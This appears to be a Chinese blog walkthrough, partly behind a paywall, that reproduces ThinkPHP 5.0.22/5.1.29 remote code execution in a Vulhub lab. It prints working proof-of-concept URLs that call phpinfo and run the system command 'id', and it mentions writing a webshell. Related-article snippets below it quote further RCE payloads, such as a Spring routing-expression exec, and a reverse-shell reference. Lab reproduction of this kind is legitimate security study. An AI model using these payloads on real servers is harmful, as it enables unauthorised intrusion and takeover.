Vulhub复现--ThinkPHP框架系列（二）

最新推荐文章于 2025-07-06 16:40:25 发布

原创

最新推荐文章于 2025-07-06 16:40:25 发布 · 383 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#php #网络安全 #漏洞复现 #web安全 #ThinkPHP

文章详细介绍了ThinkPHP5.0.22和5.1.29版本的远程代码执行漏洞，以及ThinkPHP2.x的任意代码执行问题。通过提供POC（ProofofConcept），展示了如何触发这些漏洞以执行系统命令和写入webshell。同时，提到了使用蚁剑工具进行webshell的连接和控制。

ThinkPHP5 5.0.22/5.1.29远程代码执行漏洞

ThinkPHP 2.x 任意代码执行漏洞

ThinkPHP5 5.0.22/5.1.29远程代码执行漏洞

环境路径：thinkphp/5-rce

启动环境时修改一下docker-compose.yml 将版本由3改为2即可正常启动

根据提示访问8080端口

POC

http://your-ip:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

system系统命令

http://192.168.20.158:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

tzyyyyyy

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce

qq_51577576的博客

10-02

2925

[ vulhub漏洞复现篇 ] ThinkPHP 5.0.23-Rce 漏洞复现 ThinkPHP是一款运用极广的PHP开发框架。其5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞。

Thinkphp QVD-2022-46174 多语言rce

qq_61768489的博客

01-18

2302

如果 Thinkphp 程序开启了多语言功能，那就可以通过 get、header、cookie 等位置传入参数，实现目录穿越+文件包含，通过 pearcmd 文件包含这个 trick 即可实现 RCE。PHP环境开启了PHP环境安装了pcel/pearDocker默认的PHP环境恰好满足上述条件。所以先使用vulhub进行漏洞利用的复现。

参与评论您还未登录，请先登录后发表或查看评论

Vulhub复现--ThinkPHP框架系列（一）

tzyyyyyy的博客

04-27

848

Vulhub靶场关于ThinkPHP框架的漏洞复现

ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析

！

11-21

4832

ThinkPHP5.0.24_反序列化漏洞在Linux下的写马分析 ThinkPHP5.0.24 漏洞代码<?php namespace app\index\controller; class Index { public function test01(){ $code = $_POST['code']; unserialize(base64_decode($code)); } } payload/index.php/index/index/t

【vulhub】thinkphp 2-rce 5.0.23-rce 5-rce in-sqlinjection lang-rce漏洞复现

qq_58873970的博客

09-07

885

----------------梦想，想像力和希望实现这些梦想的人的勇气充满希望。

vulhub系列之thinkphp(2-rce、5.0.23-rce、5-rce、in-sqlinjection)

小城的博客

12-24

1219

目录thinkphp 2-rce5.0.23远程代码执行大家好，我是小城，一个刚刚起步的学渣，笨鸟先飞，可惜我领悟得太晚。但从现在开始，我会努力加油进取变强！ thinkphp 2-rce 0x01 漏洞原理 ThinkPHP 2.x版本中，使用preg_replace的/e模式匹配路由： $res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)

框架漏洞-CVE复现-ThinkPHP+Laravel+Struts+Spring

xiaoheizi的博客

07-16

627

spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("要执行的命令")就是别人写好包装起来的一套工具，把你原先必须要写的，必须要做的一些复杂的东西都写好了放在那里，你只要调用他的方法，就可以实现一些本来要费好大劲的功能。工具：https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP。我要执行的是反弹shell命令，需要先对命令进行编码。

【漏洞复现-thinkcmf-文件包含】vulfocus/thinkcmf-X1.6.0-X2.2.3

10-14

2190

【thinkcmf-文件包含】public函数

vulhub-Thinkphp漏洞

最新发布

2203_76034498的博客

07-06

1204

2.x-rce Thinkphp命令执行 5.0.23rce Thinkphp命令执行 5-rce Thinkphp命令执行 in-sqlinjection ThinkphpSQL注入 lang-rce

[Vulhub] ThinkPHP漏洞合集

weixin_45605352的博客

05-11

3191

0x01 复现环境攻击机：kali linux，Windows 10 x64 靶机：XXE（下载链接https://www.vulnhub.com/entry/xxe-lab-1,254/）网络设置：均为桥接模式 0x02 漏洞复现主机发现&端口扫描先确定靶机ip地址，这里用arp-scan -l命令探测内网：发现靶机地址为192.168.43.228，接下来用nmap -sV -p- 192.168.43.228 扫描一下： -sV：探测端口服务版本；-p：指定端口；-v：显示扫描过

Thinkphp历史RCE总结与复现，从零基础到精通，收藏这篇就够了！

Javachichi的博客

03-11

1104

本文发布的工具和脚本，仅用作测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断。如果任何单位或个人认为该项目的脚本可能涉嫌侵犯其权利，则应及时通知并提供身份证明，所有权证明，我们将在收到认证文件后删除相关内容。文中所涉及的技术、思路及工具等相关知识仅供安全为目的的学习使用，任何人不得将其应用于非法用途及盈利等目的，间接使用文章中的任何工具、思路及技术，我方对于由此引起的法律后果概不负责。**添加星标不迷路**

Thinkphp---入门操作总结1

weixin_43846020的博客

01-26

559

一.下载 thinkPHP5.0+手册下载把下载好的解压命名为tp5(自己随意命名)放在xampp的htdocs里面。访问：用localhost::8090即可访问主页的（我用的是8090端口，如果你是80端口直接localhost或localhost::80即可）二.配置虚拟文件（我用的是xampp）到apache/conf/extra/http-vhosts.conf中 //我的...

渗透测试实战-文件包含和日志文件写入木马混合利用

网络安全领域优质创作者

02-27

2564

1.起因我有一个朋友，让我帮忙测试一下他的站，于是有了这篇文章。（无中生友篇） 2.信息收集访问首页一下先，看到是thinkphp v5.0版本。然后谷歌大法，直接上TP 5.X RCE的EXP，一顿骚操作： ?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=sy...

ThinkPHP接口的位置与意义

LT88997的博客

06-27

496

就个人而言ThinkPHP接口的位置和意义在Web开发中具有重要的地位。因此，在使用ThinkPHP进行Web开发时，我们应该重视接口的设计和实现工作。在Web开发的领域里，接口作为前后端交互的桥梁，其重要性不言而喻。而在使用ThinkPHP这一流行的PHP框架时，明确接口的位置和如何构建它们，对于项目的顺利进行和系统的安全性至关重要。本文旨在详细讨论ThinkPHP接口的位置及其在项目中的意义。在ThinkPHP中，接口并非一个独立的物理位置，而是由路由、控制器和模型等多个组件共同构成的逻辑概念。

ThinkPHP快速使用手册

maohe的博客

04-23

2522

快速了解ThinkPHP框架如何ORM的与数据库做交互，提供访问接口。，类比SpringBoot等框架进行学习。

php5.0+修改端口,在thinkPHP5.0里面为项目添加端口号

weixin_29707757的博客

03-18

853

1.首先进入到nginx的配置目录，如图所示：然后一份复制已经配好的文件cp 原文件新文件cp yezi.conf tt.conf新建tt.conf|然后编辑它vim tt.conf修改 listen端口号以及项目路径，root /home/yemengdi/public保存退出 wq!最后重启lnmp环境lnmp restartll命令查看新建文件的信息(l 命令列出的信息更加详细，有时间...

01-Thinkphp基础配置

qq_49283465的博客

09-07

661

自主下载composer（php包管理工具），配置相应的环境变量，下载完成后部署thinkphp框架。//用户访问xxx.com/test2/调用test2控制器里的admini方法。1、thinkphp前期配置包含哪些（包、环境变量、验证、修复、监听其他端口）？runtime目录：（运行文件夹，一般用不到）app目录下：（应用目录，负责网站控制）!public目录：（保存静态文件和主页）!vendor目录：（composer目录）config目录：（配置目录）！route目录：（路由文件）!

thinkphp端口配置

weixin_33882443的博客

08-30

1946

<?php return array( //'配置项'=>'配置值' 'MODULE_ALLOW_LIST' => array('Home'), 'DEFAULT_MODULE' => 'Home', // 默认模块 'APP_URL' => 'http://app.we...

thinkphp 同域名，同端口，同ip下session冲突问题

cms专家

07-06

2253

万恶之源，就在tp设置的 sessionid 都为一个值PHPSESSID。不管哪个项目，哪个端口，哪个域名之哟啊他们都在同服务器下，那么他们保存的session都为一个：PHPSESSID。如果遇到同一个账户，便在各个项目里面公用，如果账户不一样，就会出现session经常失效问题，甚至会出现不同客户端访问有的能正常登陆，有的不能。解决办法：需要修改不同项目的ses